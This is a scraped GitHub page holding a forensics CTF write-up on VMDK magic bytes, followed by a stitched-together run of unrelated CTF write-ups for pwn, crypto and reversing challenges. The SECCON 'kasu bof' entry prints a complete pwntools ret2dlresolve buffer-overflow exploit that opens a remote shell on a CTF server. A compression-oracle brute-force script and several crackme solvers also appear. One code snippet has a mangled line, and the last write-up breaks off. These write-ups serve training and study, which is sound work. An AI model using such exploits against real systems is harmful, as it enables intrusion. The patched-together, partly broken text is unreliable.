<summary data-disable-invalid="" data-disable-with="" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":426049755,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":false}}" aria-label="Select additional options" data-view-component="true" class="js-blob-dropdown-click select-menu-button btn-sm btn BtnGroup-item float-none px-2"></summary> <div class="SelectMenu right-0"> <div class="SelectMenu-modal width-full"> <div class="SelectMenu-list SelectMenu-list--borderless py-2"> </option></form><form class="SelectMenu-item js-update-url-with-hash " data-turbo="false" action="/palanioffcl/CTF-Writeups/edit/3dfbfc9f6d536f6f42758da711d280dfe61cf9d2/Meta%20games%20CTF%202021/Forensics/Magic%20in%20the%20hex.md" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="1IGwhb2iUt6a5wx4-2ywhrIOxUY-WDKves9fTLDhjnrdsR2xJRid30FojvBe4PnpGvTcOomGYUhDdm3HOlgj3w" autocomplete="off" /> <button disabled="disabled" title="You must be signed in to make or propose changes" type="submit" data-view-component="true" class="btn-invisible btn width-full d-flex flex-justify-between color-fg-muted text-normal p-0"> <div class="mr-5">Edit this file</div> <div class="color-fg-muted">E</div></button></form>
<button aria-label="You must be on a branch to open this file in GitHub Desktop" data-platforms="windows,mac" disabled="disabled" type="submit" data-view-component="true" class="SelectMenu-item no-wrap js-remove-unless-platform btn-invisible btn text-normal"> Open in GitHub Desktop</button> </div> </div> </div> </details></div>
<div > </div>
<button class="btn-octicon btn-octicon-danger disabled tooltipped tooltipped-nw" disabled aria-label="You must be signed in to make or propose changes" type="button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path d="M11 1.75V3h2.25a.75.75 0 0 1 0 1.5H2.75a.75.75 0 0 1 0-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75ZM4.496 6.675l.66 6.6a.25.25 0 0 0 .249.225h5.19a.25.25 0 0 0 .249-.225l.66-6.6a.75.75 0 0 1 1.492.149l-.66 6.6A1.748 1.748 0 0 1 10.595 15h-5.19a1.75 1.75 0 0 1-1.741-1.575l-.66-6.6a.75.75 0 1 1 1.492-.15ZM6.5 1.75V3h3V1.75a.25.25 0 0 0-.25-.25h-2.5a.25.25 0 0 0-.25.25Z"></path></svg> </button> </div> </div>
<div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="js-blob-dropdown-click btn-octicon p-2" aria-haspopup="true" aria-label="possible actions" data-dropdown-tracking="{"type":"blob_edit_dropdown.more_options_click","context":{"repository_id":426049755,"actor_id":null,"github_dev_enabled":false,"edit_enabled":false,"small_screen":true}}" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> </summary>
View raw View blame
</details> </div></div>
<div id="readme" class="Box-body readme blob js-code-block-container p-5 p-xl-6 gist-border-0"> <article class="markdown-body entry-content container-lg" itemprop="text"><h1 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Magic in the hex</h1><h1 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Challenge (100pts)</h1><h2 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description:</h2>Sometimes in forensics, we run into files that have odd or unknown file extensions. In these cases, it's helpful to look at some of the file format signatures to figure out what they are. We use something called "magic bytes" which are the first few bytes of a file. What is the ASCII representation of the magic bytes for a VMDK file? The flag format will be 3-4 letters (there are two correct answers).<h2 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Procedure:</h2>Let's google some stuff regarding header file in ascii of a VMDK file link<h2 dir="auto"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag:</h2>There are the flags which is applicable for the question one is KDMand another KDMV</article> </div>
Sometimes in forensics, we run into files that have odd or unknown file extensions. In these cases, it's helpful to look at some of the file format signatures to figure out what they are. We use something called "magic bytes" which are the first few bytes of a file. What is the ASCII representation of the magic bytes for a VMDK file? The flag format will be 3-4 letters (there are two correct answers).
Let's google some stuff regarding header file in ascii of a VMDK file link
There are the flags which is applicable for the question one is KDMand another KDMV
</div>
</readme-toc>
<details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump overflow-hidden" aria-label="Jump to line"> </option></form><form class="js-jump-to-line-form Box-body d-flex" data-turbo="false" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line…" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go</button></form> </details-dialog> </details>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
## SummaryMr. Snowy was the binary exploitation/pwn challenge released on day 1, and was a classic stack-based buffer overflow, specifically what many call a “ret2win” challenge. After looking at the initial behavior, we’ll go into some well-known reverse engineering and debugging tools, ghidra, radare2, and gdb, and find a function (our “win” function) that will print the flag. With all of this together, we can use the pwntools library to make a quick exploit to insert the address of the win function into the RIP, and print out the flag. Refer to link for more detail.
This writeup is more focused on teaching the tools than writing the exploit (because it's kind of easy), which you can find [here](https://an00brektn.github.io/htb-santa-mr-snowy/). |
# SECCON CTF 2021
## kasu bof
> 112>> Do you understand return-to-dl-resolve attack on 32-bit?> > `nc hiyoko.quals.seccon.jp 9001`>> Author: ptr-yudai> > [`kasu_bof.tar.gz`](kasu_bof.tar.gz)
Tags: _pwn_ _x86_ _bof_ _remote-shell_ _ret2dlresolve_
## Summary
LOL, this is the first time I read the challenge description, but yes, this an easy 32-bit _return-to-dl-resolve_ challenge.
> I'm not going to cover all the internals or details of ret2dlresolve (in this write up, I'm working on a future article), however here are two good reads:>> [https://syst3mfailure.io/ret2dl_resolve](https://syst3mfailure.io/ret2dl_resolve) > [https://gist.github.com/ricardo2197/8c7f6f5b8950ed6771c1cd3a116f7e62](https://gist.github.com/ricardo2197/8c7f6f5b8950ed6771c1cd3a116f7e62)> > The challenge author also posted his [solution](solver.py) to the SECCON CTF 2021 Discord in #pwn. I'm unaware of any external link, so I've included as part of this writeup. This is a very good resource to follow if you want to understand how to roll-your-own.
## Analysis
### Checksec
``` Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)```
At least three conditions must be met for _ret2dlresolve_, No PIE (or a base process leak), No canary (or a canary leak, or some other way to write down stack), and Partial RELRO. We're all clear here.
### Decompile with Ghidra
```cundefined4 main(void){ char local_88 [128]; undefined4 local_8; local_8 = 0; gets(local_88); return 0;}```
`gets` and the lack of mitigations above = easy shell with _ret2dlresolve_.
*Are there other methods?*
Perhaps, however there's not a lot to work with. No leaks, and nothing else in the GOT. IOW, we're blind, no output until we get a shell.
## Exploit
```python#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./kasu')
dl = Ret2dlresolvePayload(binary, symbol='system', args=['/bin/sh'])
rop = ROP(binary)rop.gets(dl.data_addr,len(dl.payload))rop.ret2dlresolve(dl)
if args.REMOTE: p = remote('hiyoko.quals.seccon.jp', 9001)else: p = process(binary.path)
payload = b''payload += 0x88 * b'A'payload += rop.chain()payload += b'\n'payload += dl.payload
p.sendline(payload)p.interactive()```
Almost straight from: [https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html).
All we needed to figure out is the `0x88` (end of the stack frame where the return address is), and we get this for free from Ghidra (.e.g `local_88`).
```bash# ./exploit.py REMOTE=1[*] '/pwd/datajerk/seccon2021/kasu/kasu' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)[*] Loaded 11 cached gadgets for './kasu'[+] Opening connection to hiyoko.quals.seccon.jp on port 9001: Done[*] Switching to interactive mode$ iduid=999(pwn) gid=999(pwn) groups=999(pwn)$ cat flag*SECCON{jUst_4_s1mpL3_b0f_ch4ll3ng3}``` |
- Given a seed and a string, the server shuffles the FLAG based on the seed and prepend with the string. We can get the original and the compressed size of the final string.
```bash Please send: seed:string\n I'll then show you the compression benchmark results! Note: Flag has format DrgnS{[A-Z]+} 1:A none 26 zlib 34 bzip2 63 lzma 84 ```
- `none` means not compressing. So, we know the length of the unknown FLAG is $26 - 1 - 7 = 18$.- Specify the seed, which means we can know the original position of each character after the FLAG is shuffled.- Use `DrgnS{ABCDEFGHIJKLMNOPQR}` locally to observe. - With `seed = 1`, the shuffled FLAG begins with the letter `E`. - It is observed that when the input string is 4 identical letters, the length of `EEEE` and the shuffled FLAG string compressed with zlib or bzip2 will be smaller than other letters.
```bash 1:EEEE none 29 zlib 35 bzip2 69 lzma 88 1:AAAA none 29 zlib 37 bzip2 70 lzma 88 1:SSSS none 29 zlib 37 bzip2 70 lzma 88 ```
- Firstly, find the seed that shuffles each letter as the beginning.
```py import random
flag_pos = b'DrgnS{ABCTEFGHIJKLMNOPQR}' # 为方便查找，每个字符均不相同 d = {} for i in range(10000): random.seed(i) tflag = bytearray(flag_pos) random.shuffle(tflag) if tflag[0] in b'ABCTEFGHIJKLMNOPQR' and tflag[0] not in d: d[tflag[0]] = i if len(d) == 18: break ```
- Secondly, brute force each letter (PS: There is a certain element of luck. If the seed is not well-selected, it will be difficult to use the size of the compressed string to judge because it starts with consecutive letters. ).
```py import pwn
conn = pwn.remote("compresstheflag.hackable.software", 1337) conn.recvline_contains('Note')
flag_pos = 'DrgnS{ABCTEFGHIJKLMNOPQR}' flag = list('DrgnS{xxxxxxxxxxxxxxxxxx}') for k in d: min, mic = 0xffff, 'A' for c in range(ord('A'), ord('Z') + 1): conn.send(f'{d[k]}:{chr(c) * 4}\n') l = int(conn.recvline_contains('zlib').split(b' ')[-1]) if l < min: min, mic = l, chr(c) flag[flag_pos.find(chr(k))] = mic
print(''.join(flag)) # DrgnS{THISISACRIMEIGUESS} ``` |
# nameless (from idekCTF2021)You can calculate (p+q)^2, (p-q)^2 because (p+q)^2 = p^2+q^2+2pq = p^2+q^2+2*n and (p-q)^2 = p^2+q^2-2pq = p^2+q^2-2*n. Once you know the two values above, you can easily calculate p, q.
Please check the code for detailed implementation. |
AES-CBC known plaintext-ciphertext pair with IV control.
After that its a simple PyJail escape.
Full writeup: [https://ctf.rip/write-ups/pwn/crypto/nitectf-cbc-jail/]https://ctf.rip/write-ups/pwn/crypto/nitectf-cbc-jail/) |
1. Let's load binary into Ghidra and navigate to `main` funaction at `0x101208`.
Decompiled view of this function, after fixing some data types and renaming couple of variables looks like this:
```c int FUN_00101208(void) { char cVar1; int iVar2; char *pcVar3; size_t sVar4; long lVar5; long in_FS_OFFSET; char input_buf [64]; long local_20; local_20 = *(long *)(in_FS_OFFSET + 0x28); __printf_chk(1,"What\'s the flag? "); input_buf._0_8_ = 0; input_buf._8_8_ = 0; input_buf._16_8_ = 0; input_buf._24_8_ = 0; input_buf._32_8_ = 0; input_buf._40_8_ = 0; input_buf._48_8_ = 0; input_buf._56_8_ = 0; pcVar3 = fgets(input_buf,0x40,stdin); if (pcVar3 == (char *)0x0) { puts("no!!"); iVar2 = 1; } else { sVar4 = strcspn(input_buf,"\n"); input_buf[sVar4] = '\0'; lVar5 = 0; do { cVar1 = FUN_001011e9(); input_buf[lVar5] = input_buf[lVar5] ^ cVar1 + (char)lVar5; lVar5 = lVar5 + 1; } while (lVar5 != 0x40); iVar2 = memcmp(input_buf,PTR_ARRAY_00104010,0x40); if (iVar2 == 0) { puts("You got it!"); } else { puts("That\'s not it..."); iVar2 = 1; } } if (local_20 == *(long *)(in_FS_OFFSET + 0x28)) { return iVar2; } } ```
As we can see here:
`pcVar3 = fgets(input_buf,0x40,stdin);`
`64` bytes are read from the input and stored into a an `input_buf`.
1. After that each byte in `input_buf` is XORed with value returned from `FUN_001011e9` + current itterator
It's better viewed from the disassembly:
``` LAB_001012ae XREF[1]: 001012c6(j) 001012ae b8 00 00 MOV EAX,0x0 00 00 001012b3 e8 31 ff CALL FUN_001011e9 undefined FUN_001011e9() ff ff 001012b8 01 d8 ADD EAX,EBX 001012ba 30 44 1d 00 XOR byte ptr [RBP + RBX*0x1]=>input_buf,AL 001012be 48 83 c3 01 ADD RBX,0x1 001012c2 48 83 fb 40 CMP RBX,0x40 001012c6 75 e6 JNZ LAB_001012ae ```
1. And a decompilation of `FUN_001011e9` is next:
```c void FUN_001011e9(void) { DAT_0010402c = DAT_0010402c * 0x41c64e6d + 0x3039 & 0x7fffffff; return; } ```
Here, some value from gloval variable stored at `0x10402c` (wich is initialized with `0` as shown below) is multipied by `0x41c64e6d`, summed up with another constant `0x3039` and bitwise added with `0x7fffffff`:
``` DAT_0010402c XREF[2]: FUN_001011e9:001011ed(R), FUN_001011e9:00101201(W) 0010402c 00 00 00 00 undefined4 00000000h ```
1. After all of this is done the `memcpy` is called:
```c iVar2 = memcmp(input_buf,PTR_ARRAY_00104010,0x40); if (iVar2 == 0) { puts("You got it!"); } ```
1. We can reverse all of this with a simple python script and capture the flag:
```python #!/usr/bin/env python3
enc_bytes = [ 0x74, 0x1A, 0x95, 0x4E, 0xBA, 0xDB, 0x47, 0x64, 0x09, 0x2D, 0xD1, 0xBF, 0x8A, 0x9D, 0xDE, 0x5A, 0xD7, 0x5C, 0x93, 0x16, 0x09, 0x3B, 0x30, 0x6F, 0x97, 0x40, 0xD0, 0x7C, 0x57, 0xDB, 0xDE, 0x0C, 0x09, 0xA0, 0x84, 0x9B, 0x8A, 0x76, 0x2F, 0xB1, 0x57, 0xA2, 0xE1, 0x4F, 0xB9, 0x6F, 0x81, 0xBF, 0xB9, 0xBF, 0xE1, 0xEF, 0x79, 0xCF, 0x01, 0xDF, 0xF9, 0x9F, 0xE1, 0x8F, 0x39, 0x2F, 0x81, 0xFF ]
x = 0 res = [] for i in range(0, 64): x = ((x * 0x41c64e6d) + 0x3039) & 0x7fffffff r = ((x + i) & 0x000000ff) ^ enc_bytes[i] res.append(r)
print(bytearray(res).decode()) ```
```sh MetaCTF{pr0p3r_encrypt10n_1snt_s0_e4sy...} ```
That's it. |
**Full write-up (+files):** [https://www.sebven.com/ctf/2021/11/16/K3RN3LCTF2021-lightningrod.html](https://www.sebven.com/ctf/2021/11/16/K3RN3LCTF2021-lightningrod.html)
Reverse Engineering – 499 pts (3 solves) – Chall author: Polymero (me)
“Warning: Weather Control Device detected! ZAP ZAP [insert conscript_death.mp3 here]”
“Note: there is a typo in the flag, sorry >m<.”
nc ctf.k3rn3l4rmy.com 2245
Files: lightningrod, burned.crisp
Source code (not provided during CTF): [lightningrod.C]
This challenge was part of our very first CTF, K3RN3LCTF 2021. |
# Tutorial - Rotting Fruits
This was the easiest challenge in the Crypto category, if you take a look at the description you can see it is written this might help, when you click on the link it takes you to wikipedia page with a so called "caeser cipher".
We google caeser cipher decoder we get -
The first one we get is https://www.dcode.fr/caesar-cipher now, we input the encrypted flag "vqrx{ebg13_vf_xvaqn_xrjy_aty}" and we get -
# Flag - idek{rot13_is_kinda_kewl_ngl} |
TL;DR: lattice attack on biased nonce ECDSA + MT19937 prediction for ECDSA nonces
Full writeup at [https://org.anize.rs/SECCON-2021/crypto/signwars](https://org.anize.rs/SECCON-2021/crypto/signwars) |
# Rolling on my own
We start opening the binary in ghidra, and get a nice dissassembled main:
```cvoid main(void)
{ int iVar1; undefined8 local_58; undefined8 local_50; undefined8 local_48; undefined8 local_40; char local_38 [36]; int local_14; int local_10; int local_c; puts("I can\'t just let anyone in, what\'s the password?"); __isoc99_scanf(&DAT_00102039); local_58 = 0x455d35402f28272b; local_50 = 0x43277c222d58366a; local_48 = 0x5650324666795152; local_40 = 0x5f472c67575b6353; local_c = 0; while( true ) { if (0x1f < local_c) { printf("https://www.youtube.com/watch?v=TeSRoEjevHI"); return; } local_10 = (int)local_38[local_c]; iVar1 = roll(local_c); iVar1 = iVar1 + local_10; local_14 = iVar1 + ((iVar1 / 6 + (iVar1 >> 0x1f) >> 4) - (iVar1 >> 0x1f)) * -0x60 + 0x22; if (local_14 != *(char *)((long)&local_58 + (long)local_c)) break; local_c = local_c + 1; } printf("Imposter!!"); /* WARNING: Subroutine does not return */ exit(0);}```
We also have a `roll` function that is generating Fibonacci numbers:
```cint roll(int param_1)
{ int iVar1; if (1 < param_1) { iVar1 = roll(param_1 + -1); param_1 = roll(param_1 + -2); param_1 = param_1 + iVar1; } return param_1;}```
the `local_58`, `local_50`, `local_48` and `local_40` could be our flag, we can try to confirm this trying to encrypt some known plaintext with the function:
```pythondef roll(i): # actually fibo if (i > 1): tmp = roll(i-1) i = roll(i-2) i = i + tmp return i # let's try to encrypt know plaintext see what happens = b"idek{"out = b''for i in range(0, len(s)): mod = roll(i) c = mod + s[i] enc_char = c + ((c // 6 + (c >> 0x1f) >> 4) - (c >> 0x1f)) * -0x60 + 0x22 out += bytes([enc_char])print(out.hex()) # 2b27282f40, looks like local_58 content in big endian, we're on good track```
From here we can just bruteforce every printable characters until we find a match in the `local_xx`:
```pythonfrom pwn import *import string
# extracted from binary, most probably the flagflag1 = 0x455d35402f28272bflag2 = 0x43277c222d58366aflag3 = 0x5650324666795152flag4 = 0x5f472c67575b6353
# flag = p64(flag1) + p64(flag2) + p64(flag3) + p64(flag4)flag = p64(flag1) + p64(flag2) + p64(flag3) + p64(flag4)
out = b''for i in range(0, len(flag)): mod = roll(i) expected = flag[i] for char in string.printable: # iterate on all printable chars c = mod + ord(char) enc_char = c + ((c // 6 + (c >> 0x1f) >> 4) - (c >> 0x1f)) * -0x60 + 0x22 if enc_char == expected: # if it matches the encrypted flag byte, we know that `char` is the clear byte. out += bytes([ord(char)])print(out)``` |
# SANTA
Challenge author: tomadimitrie
Tell your wish to Santa... it might come true
## Analysis
In this challenge we were given an ELF-64bit named `santa` with no canary, NX enabled, and no PIE.
